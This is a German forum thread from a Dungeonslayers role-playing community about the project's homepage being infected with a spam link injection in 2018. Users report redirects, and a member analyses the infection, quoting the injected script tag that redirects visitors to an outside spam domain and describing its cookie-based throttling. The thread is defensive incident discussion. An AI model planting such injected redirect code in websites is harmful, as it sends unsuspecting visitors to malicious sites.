Burning Forum

Dungeonslayers => Allgemein => Thema gestartet von: wuzi am 16. April 2018, 09:08:04

Titel: internetzugang
Beitrag von: wuzi am 16. April 2018, 09:08:04
Hey, weil's irgendwie bei all meinen Geräten ist, wenn man auf die dungenslayer.net seite geht, kommt man auf irgendeine spam seite. Die unterseiten funktionieren regulär. Ist das nur bei mir so?
Titel: Antw:internetzugang
Beitrag von: Galactic Ben am 16. April 2018, 09:37:06
Das ist mir auch schon aufgefallen, wenn mans dann ein zweites Mal eingibt funktionierts aber...
Titel: Antw:internetzugang
Beitrag von: Blakharaz am 16. April 2018, 10:43:03
Ja, bei mir auch - ich wollte es auch gerade reinschreiben.
Titel: Antw:internetzugang
Beitrag von: Bruder Grimm am 17. April 2018, 10:21:40
Das Problem besteht offenbar immer noch.
Was kann man gegen so was machen?
Titel: Antw:internetzugang
Beitrag von: sico72 am 17. April 2018, 11:34:36
Ich habe CK informiert. Er ist da dran.
Titel: Antw:internetzugang
Beitrag von: Zauberlehrling am 19. April 2018, 22:01:27
ich wollte fragen obs behoben ist - weil ich sehe nichts (habe allerdings chromium+adblockplus).
Titel: Antw:internetzugang
Beitrag von: Skyclimber am 19. April 2018, 22:16:45
Scheint behoben zu sein  :thumbup:
Titel: Antw:internetzugang
Beitrag von: Galactic Ben am 20. April 2018, 07:57:10
Jap, funktioniert wieder  :+1:
Titel: Antw:internetzugang
Beitrag von: Zauberlehrling am 20. April 2018, 08:18:45
Danke CK!
Titel: Antw:internetzugang
Beitrag von: CK am 20. April 2018, 10:14:03
Hiho!

Ich trau dem Braten noch nicht.

Seit Januar gab es 4 Angriffe, der letzte war am massivsten. Alles noch recht easy behebbar, mögliche Schlupflöcher geschlossen, doch wir müssen das noch beobachten.

Bis dahin Obacht und Vorsicht plz.

Titel: Antw:internetzugang
Beitrag von: Blakharaz am 20. April 2018, 16:00:47
Ich wurde gerade wieder umgeleitet...
Titel: Antw:internetzugang
Beitrag von: Dzaarion am 20. April 2018, 21:27:16
Ich wurde gerade wieder umgeleitet...

Dito
*Beliebige Schimpfwörter einfügen* die sonen Mist machen >:(
Titel: Antw:internetzugang
Beitrag von: Zauberlehrling am 20. April 2018, 21:41:16
ja, ich habe wohl zu früh gejubelt...
Titel: Antw:internetzugang
Beitrag von: Blakharaz am 21. April 2018, 15:27:03
Und jetzt hatte ich es zum ersten Mal, dass ich von der HP aus zum Forum auf die Spam-Seite umgeleitet wurde (bislang immer nur, wenn ich auf die HP wollte)
Titel: Antw:internetzugang
Beitrag von: Dzaarion am 22. April 2018, 09:48:59
Und jetzt hatte ich es zum ersten Mal, dass ich von der HP aus zum Forum auf die Spam-Seite umgeleitet wurde

Das war bei mir aber schon die ganze Zeit so :(
Titel: Antw:internetzugang
Beitrag von: wuzi am 23. April 2018, 13:13:27
Der slayerpit link auf der Hauptseite is leider auch betroffen
Titel: Antw:internetzugang
Beitrag von: Galactic Ben am 23. April 2018, 14:59:00
Der slayerpit link auf der Hauptseite is leider auch betroffen

Ebenso die Slaylist, ins Forum bin ich dagegen ohne Spam gekommen
Titel: Antw:internetzugang
Beitrag von: Sintholos am 23. April 2018, 15:30:12
(https://memegenerator.net/img/instances/57579181/its-spreading-everywhere.jpg)

Irgendjemand sollte irgendwie irgendetwas tun.  :'(
Titel: Antw:internetzugang
Beitrag von: avakar am 23. April 2018, 16:07:02
HP aus zum Forum

Der slayerpit link auf der Hauptseite

Ebenso die Slaylist, ins Forum bin ich dagegen ohne Spam gekommen

its spreading everywhere...

Irgendjemand sollte irgendwie irgendetwas tun.  :'(
Zur Klarstellung und vorbeugend für irgendwelche Panikmache hier.

Die Domäne *.dungenslayers.net ist offenbar befallen durch eine spam link injection. D.h. sobald man die Homepage selbst oder dort einen Link anklickt, dann wird der Browser anstatt dem eigentlichen Ziel eine Spamseite öffnen. Die Ziele selbst sind aber sauber, insbesondere Forum und Slayer's Pit.

Der Handlungsbedarf besteht seitens des Webmasters von www.dungenslayers.net, also vermutlich CK.
Titel: Antw:internetzugang
Beitrag von: Zauberlehrling am 23. April 2018, 17:20:44
Du kennst dich am besten aus avakar. Was kann man da machen?
Bis zur Lösung: ich gehe zur slayerspit und zum Forum über die direktlinks als Bookmark. 
Titel: Antw:internetzugang
Beitrag von: avakar am 24. April 2018, 07:46:58
Du kennst dich am besten aus avakar. Was kann man da machen?
Das kann ich leider nicht beantworten, dazu kenne ich mich im Detail zu wenig aus.

Man wird den Infektionsweg und die Art des Angriffs ausfindig machen müssen, dann die vorhandenen Daten und den Quellcode nach Verunreinigungen durchforsten. Danach muss man überlegen wie man die Verunreinigungen beseitigt und die konkrete Lücke nachhaltig schließt. Das ist echter Aufwand und nicht zu unterschätzen.

Desweiteren muss man grundsätzlich Maßnahmen ergreifen wie man die Angriffsfläche auf die Homepage reduzieren kann und einen schnellen Prozess zum Einspielen von Updates aufbauen. Auch muss man überlegen, wie man Änderungen am Quellcode feststellen kann (z.B. Versionskontrollsystem).

Bis zur Lösung: ich gehe zur slayerspit und zum Forum über die direktlinks als Bookmark. 
Ja, das ist korrektes Anwenderverhalten. www.dungeonslayers.net sollte wie alle Spamseiten von Nutzern nicht mehr aufgerufen werden.
Titel: Antw:internetzugang
Beitrag von: CK am 26. April 2018, 07:06:09
Ich bekomme hier echt n Hals - ich befolge sämtliche Anweisung und trotzdem zickt die Gülle noch.

Notfalls muss ich die Seite komplett plätten, wobei ich gar nicht mal glaube, dass das was bringt.

Nehme gerade nochmal Reparaturen vor...
Titel: Antw:internetzugang
Beitrag von: Asher am 27. April 2018, 13:49:30
Weiß nicht ob eine Bestätigung weiter hilft. Ich bin heute nicht ein einziges mal umgeleitet worden von der Hauptseite. (Sonst hatte ich immer eine Fehlerseite da unsere Firewall automatisch das Ziel blockiert hatte.
Wenn noch jemand was bekommt vielleicht den Cache leer machen?

Aber hier läufts...!
Titel: Antw:internetzugang
Beitrag von: Blakharaz am 27. April 2018, 13:59:09
Weiß nicht ob eine Bestätigung weiter hilft. Ich bin heute nicht ein einziges mal umgeleitet worden von der Hauptseite. (Sonst hatte ich immer eine Fehlerseite da unsere Firewall automatisch das Ziel blockiert hatte.
Wenn noch jemand was bekommt vielleicht den Cache leer machen?

Aber hier läufts...!

Nach dem leeren des Cache werde ich (zumindest für den Moment) auch nicht mehr umgeleitet.
Titel: Antw:internetzugang
Beitrag von: SeoP am 27. April 2018, 14:09:48
@ CK,
hat es vlt damit etwas zu tun?
https://www.computerbase.de/2018-04/drupal-gefaehrliche-luecke/
Titel: Antw:internetzugang
Beitrag von: Skyclimber am 27. April 2018, 14:17:24
Bei mir läuft es momentan auch super  ???

Super, dass drauf geguckt wird  :thumbup:
Titel: Antw:internetzugang
Beitrag von: Blakharaz am 29. April 2018, 13:55:16
Leider hat es nur 48 Stunden gehalten und geht (zumindest bei mir) jetzt wieder los...
Titel: Antw:internetzugang
Beitrag von: Asher am 01. Mai 2018, 11:10:26
Bestätigt... Umleitung ist wieder drin
Titel: Antw:internetzugang
Beitrag von: avakar am 01. Mai 2018, 12:41:01
Ja, es tritt wieder auf.

Eine Netzwerkanalyse zeigt auch, warum die Umleitungen nur sprodaisch auftreten:

Der Schadcode auf dem Server setzt ein Cookie 'a777d' mit einer Gültigkeit von ~10 Stunden. Hieran identifiziert der Schadcode offenbar, ob der Besucher schon einmal umgeleitet wurde oder nicht. Wenn das Cookie nicht vorhanden ist, dann wird man umgeleitet, ansonsten erst nach Ablauf des Cookies wieder. Damit ist auch das Phänomen erklärt, dass der zweite Aufruf nach Umleitung von www.dungenonslayers.net funktioniert.

Die Umleitung kommt dadurch zustande, dass in der ersten Zeile der HTML-Antwort folgendes Tag von Schadcode untergeschoben wird, falls das Cookie nicht vorhanden ist:

<script>window.location.replace("http://someupon.tk/index/?2601510941471");window.location.href = "http://someupon.tk/index/?2601510941471";</script><br />

Die Links der Weiterleitungen variieren.

Das Verhalten lässt darauf schließen, dass sich der Unhold in einer (zentralen?) php-Datei oder Funktion, eingenistet hat.

CK, vielleicht hilft dir das etwas weiter?
Titel: Antw:internetzugang
Beitrag von: CK am 02. Mai 2018, 15:32:57
Definitiv, ich glaube, ich habe auch schon was und teste gerade... *aufuhrschiel*
Titel: Antw:internetzugang
Beitrag von: Zauberlehrling am 06. Mai 2018, 17:45:38
Ich hoffe ja, dass man das bald in den Griff bekommen kann. Ich habe das Gefühl, dass immer weniger hier im Forum los ist - und das (auch) auf Grund dieses Problems...
Titel: Antw:internetzugang
Beitrag von: SeoP am 06. Mai 2018, 20:38:39
Ich habe das Gefühl, dass immer weniger hier im Forum los ist - und das (auch) auf Grund dieses Problems...
Das ist immer phasenweise ...
rund um die Slayvention bis hin zum Community Kalender ist hier immer recht viel los.

Hinzukommt, das  :*s: als solches "rund" ist und keine Neuerungen anstehen.
(neue) Fanwerke lockern das Geschehen zwar auf,  ansonsten ist es relativ ruhig.
Viele Fragen lassen sich durch die Suchfunktion bereits beantworten.
Titel: Antw:internetzugang
Beitrag von: CK am 07. Mai 2018, 07:04:24
Ich lehne mich ungern aus dem Fenster, aber ich glaube, das "Viren"-Problem ist imho nicht mehr existent. Seit FR scheint es geklappt zu haben.
Titel: Antw:internetzugang
Beitrag von: Sintholos am 07. Mai 2018, 09:10:16
Ich lehne mich ungern aus dem Fenster, aber ich glaube, das "Viren"-Problem ist imho nicht mehr existent. Seit FR scheint es geklappt zu haben.

Dann hoffen wir mal auf das Beste. Können wir dann also am Wochenende das zweite Paket erwarten?  :-X
Titel: Antw:internetzugang
Beitrag von: Blakharaz am 07. Mai 2018, 09:56:42
Ich lehne mich ungern aus dem Fenster, aber ich glaube, das "Viren"-Problem ist imho nicht mehr existent. Seit FR scheint es geklappt zu haben.
Ja, über das WE ist es nicht mehr aufgetreten.
Titel: Antw:internetzugang
Beitrag von: CK am 07. Mai 2018, 11:12:35
Dann hoffen wir mal auf das Beste. Können wir dann also am Wochenende das zweite Paket erwarten?  :-X

Definitiv vorher, ich hab bloß am FR - nachdem ich eigentlich dachte, es ist behoben - mich nochmal dem "Problem" widmen müssen und wusste noch nicht, ob es das jetzt war, daher die Verzögerung.
Titel: Antw:internetzugang
Beitrag von: Zauberlehrling am 07. Mai 2018, 17:29:14
Ich habe das Gefühl, dass immer weniger hier im Forum los ist - und das (auch) auf Grund dieses Problems...
Das ist immer phasenweise ...
rund um die Slayvention bis hin zum Community Kalender ist hier immer recht viel los.

Hinzukommt, das  :*s: als solches "rund" ist und keine Neuerungen anstehen.
(neue) Fanwerke lockern das Geschehen zwar auf,  ansonsten ist es relativ ruhig.
Viele Fragen lassen sich durch die Suchfunktion bereits beantworten.

Nunja - es ist schon gar wenig los hier momentan - ich schiebe es mal aufs Wetter. Zwei Fragen stellen sich mir:
- Meintest du wirklich STARSLAYERS? Ich dachte das ist eben noch nicht "fertig".
- Ich finde die Suchfunktion echt nicht gut. Vorallem wegen der ganzen alten Threads mit den vielen "?" - ich finde meist gerade nicht was ich suche, weil gewissen Begriffe einfach nicht gefunden werden  - "Rüstung", "Würfel/Würfe" sind da nur Beispiele für "Problembegriffe".

@CK: Danke vielmals!
Titel: Antw:internetzugang
Beitrag von: SeoP am 08. Mai 2018, 11:16:57
meinte  :ds:
Ich komm mit SuFu ziemlich gut klar, denke aber das ist bei jedem auch so ne subjektive Nummer
Titel: Antw:internetzugang
Beitrag von: CK am 08. Mai 2018, 11:22:32
Ich bekomme langsam echt HASS - wollte eben Download 2 auf den Weg schicken und dann ist diese Scheisse immer noch in meinem Webspace :'(

@avakar: Glaube, wir müssen uns mal zusammen da reinklinken - ich sitze da jetzt seit Wochen dran und bekomm die Scheisse nicht weg.

@All: Sry, Leute, mich nervt das selber am allermeisten - kann doch nicht sein.
Titel: Antw:internetzugang
Beitrag von: avakar am 08. Mai 2018, 12:16:33
@avakar: Glaube, wir müssen uns mal zusammen da reinklinken - ich sitze da jetzt seit Wochen dran und bekomm die Scheisse nicht weg.
Christian, bitte nimm die Seite sofort vom Netz.

Mittlerweile schlägt bei einem Besuch der Virenscanner an, d.h. die Seite gefährdet alle Besucher.

Am Freitag hätte ich Zeit, ggf. Sonntag auch. Oder abends unter der Woche, aber dann brauche ich einen selbstständigen unabhängigen Admin-Zugang.
Titel: Antw:internetzugang
Beitrag von: CK am 09. Mai 2018, 09:13:42
Und weg ist sie.
Titel: Antw:internetzugang
Beitrag von: Hugin am 17. Mai 2018, 08:01:57
Slaylichsten Dank an unseren Helden Avakar!!!  :thumbup: :thumbup: :thumbup: :+1: :+1:
Titel: Antw:internetzugang
Beitrag von: Ariadar am 01. Juli 2018, 12:16:38
Und nun. Wo ist sie?

 :'(
Titel: Antw:internetzugang
Beitrag von: Sintholos am 09. Oktober 2018, 13:38:03
Hab gerade versucht dem Link von CK auf das Spielleitertutorial auf der DS-Seite zu folgen und mein Sophos ist wieder angesprungen. Könnte sich das vielleicht nochmal jemand anschauen? Nicht das der Mist wieder von vorne losgeht.  :-\
Titel: Antw:internetzugang
Beitrag von: Camo am 09. Oktober 2018, 14:19:30
Auf der .net-Seite ist mein System lieb und brav.
Titel: Antw:internetzugang
Beitrag von: Sintholos am 09. Oktober 2018, 14:36:49
Also schon infiziert.  :D

Ne im Ernst. Bei mir funktioniert die .de-Seite gut, aber da jeder Link auf .net geht, springt bei mir immer eine Sophosmeldung rein, die sagt "blocked by Sophos Surf Protection". Wollt es nur rechtzeitig anmerken.
Titel: Antw:internetzugang
Beitrag von: Camo am 09. Oktober 2018, 14:54:04
Kann es sein, dass die noch im System haben, dass die Seite infiziert war? Oder dass sie die Umleitung als Gefahr sehen?
Titel: Antw:internetzugang
Beitrag von: CK am 09. Oktober 2018, 15:50:24
Sollte eigentlich alles sauber sein, Avakar war mehr als gründlich.
Titel: Antw:internetzugang
Beitrag von: Framo am 09. Oktober 2018, 16:27:03
Über mein Tablet funktioniert alles normal. Könnte es sein das die Cookie abfrage vielleicht die Warnung auslöst?
Titel: Antw:internetzugang
Beitrag von: avakar am 09. Oktober 2018, 17:27:12
Ne im Ernst. Bei mir funktioniert die .de-Seite gut, aber da jeder Link auf .net geht, springt bei mir immer eine Sophosmeldung rein, die sagt "blocked by Sophos Surf Protection". Wollt es nur rechtzeitig anmerken.
- Von welcher Seite kamst du? URL?
 - Worauf hast du geklickt? URL?
 - Passiert das auch, wenn du von *.net auf einen Link nach *.net klickst?
 - Welchen Browser nutzt du?

Achso, gibt es die Fehlermeldung vom Sophos auch genauer?
Titel: Antw:internetzugang
Beitrag von: Sintholos am 10. Oktober 2018, 05:44:59
Ich kam von hier: Link (https://forum.burning-books.de/index.php?topic=9748.msg151620#msg151620)
Ich klickte auf den Link von CK. Link (http://www.dungeonslayers.net/spielleiter-tutorial/spielleiter-tutorial-teil-5/)
Ja.
Mozilla Firefox.

Ironische Geschichte wegen der Meldung. Vorgestern kam ebenfalls noch die Meldung beim Heim-PC. Da hatte das McAfee angeschlagen. Jetzt wollt ich dir Screenshots davon schicken und es kommt keine Meldung mehr. Bin verwirrt und zweifel an meiner eigenen Zurechnungsfähigkeit...  :-\
Titel: Antw:internetzugang
Beitrag von: avakar am 10. Oktober 2018, 08:46:52
Mozilla Firefox.
Gut, lass mal auf die Cookies der Seite schauen. Dazu mach bitte folgendes:
 - Gehe auf http://www.dungeonslayers.net/spielleiter-tutorial/spielleiter-tutorial-teil-5/
 - F12
 - Web-Speicher
 - Cookies
 - http://www.dungeonslayers.net
 - Screenshot der Liste, "Läuft ab am", "Zuletzt zugegriffen", "Wert" sollten gut erkennbar sein.

Ein Beispielscreen ist im Anhang.

Ironische Geschichte wegen der Meldung. Vorgestern kam ebenfalls noch die Meldung beim Heim-PC. Da hatte das McAfee angeschlagen. Jetzt wollt ich dir Screenshots davon schicken und es kommt keine Meldung mehr. Bin verwirrt und zweifel an meiner eigenen Zurechnungsfähigkeit...  :-\
Die alte Infektion hatte eine einfache Verschleierungstaktik: Einmal wird man weitergeleitet, dann zwei Wochen Ruhe, dann einmal Weiterleitung, dann wieder Ruhe, ... Gesteuert wurde das über die Existenz eines Cookies.

Ich habe aktuell aber eine andere Vermutung. Auf der Seite genutzte Plugins binden externe Javascript-Scripte ein, d.h. sie laden externen Content. Für solche Scripte gibt es Sicherheitsvorgaben und deren Einhaltung wird von Browsern und ggf. Antivirus-Herstellern (AV) beäugt und bewertet. Auf der DS-Seite kommt es hier zu einigen Warnungen, wodurch dann beim AV ein Alarm getriggert wird. (Screenshot auch im Anhang).
Titel: Antw:internetzugang
Beitrag von: Sintholos am 10. Oktober 2018, 09:08:36
Naja... ich sag mal: Ist auch der Arbeitslaptop, kann sein, dass die Seite wegen der externen Scripte gesperrt wird. Hab mal die Meldung als Screenshot angehängt, Admin geschwärzt.
Die .de-Seite wird auch nicht ordentlich angezeigt, es kommt aber nicht die Blocked-Meldung. Für die .net-Adresse steht an der von dir mit Screenshot angehängten Stelle nix drin. Wird offensichtlich sofort alles verworfen. Die .de-Seite geht, aber es werden z.B. nicht alle Hintergründe oder Bilder dargestellt und auch die Formatierung macht eher den Eindruck als wärs im "Abgesicherten Modus".
Titel: Antw:internetzugang
Beitrag von: avakar am 10. Oktober 2018, 10:10:47
In der Sophos Meldung steht der Grund: "Reputation Limit".

Das basiert offenbar auf https://trustedsource.org/en/feedback/url, einer mehr oder weniger intransparenten Einstufung von Webseiten. Hier wirds lustig für MacAffee SmartFilter XL:

https://www.dungeonslayers.de
 - Categorized URL
 - Games
 - Forum/Bulletin Boards
 = Minimal Risk

https://www.dungeonslayers.net
 - Categorized URL   
 - Games
 - Malicious Sites
 - PUPs (potentially unwanted programs)
 = High Risk

Insofern erstmal Entwarnung.
Titel: Antw:internetzugang
Beitrag von: Zauberlehrling am 10. Oktober 2018, 10:20:56
Nunja - :ds: hatte ja ein Problem - insofern ist die Einstufung zumindest nicht von irgendwoher...
Titel: Antw:internetzugang
Beitrag von: Sintholos am 10. Oktober 2018, 11:02:26
https://www.dungeonslayers.net
 - Categorized URL   
 - Games
 - Malicious Sites
 - PUPs (potentially unwanted programs)
 = High Risk

Insofern erstmal Entwarnung.

Das ist genau die Art Meldung die ich bekommen habe. Nur halt auf Deutsch. Wenn das so ist, dann gut dass wir mal drüber gesprochen haben.  :thumbup:
Titel: Antw:internetzugang
Beitrag von: avakar am 10. Oktober 2018, 12:05:23
Nunja - :ds: hatte ja ein Problem - insofern ist die Einstufung zumindest nicht von irgendwoher...
Ärgerlich ist es dennoch. Zum einen ist https://www.dungeonslayers.de und https://www.dungeonslayers.net _das selbe_, daher sind unterschiedliche Bewertungen nicht nachvollziehbar. Zum anderen ist der Befall ca. 6 Monate her. Gemessen an den kurzlebigen Zyklen im Internet wäre es angemessen, dass der Hersteller seine Datenbank sehr häufig aktualisiert. Das ist aber natürlich nicht in deren Sinn.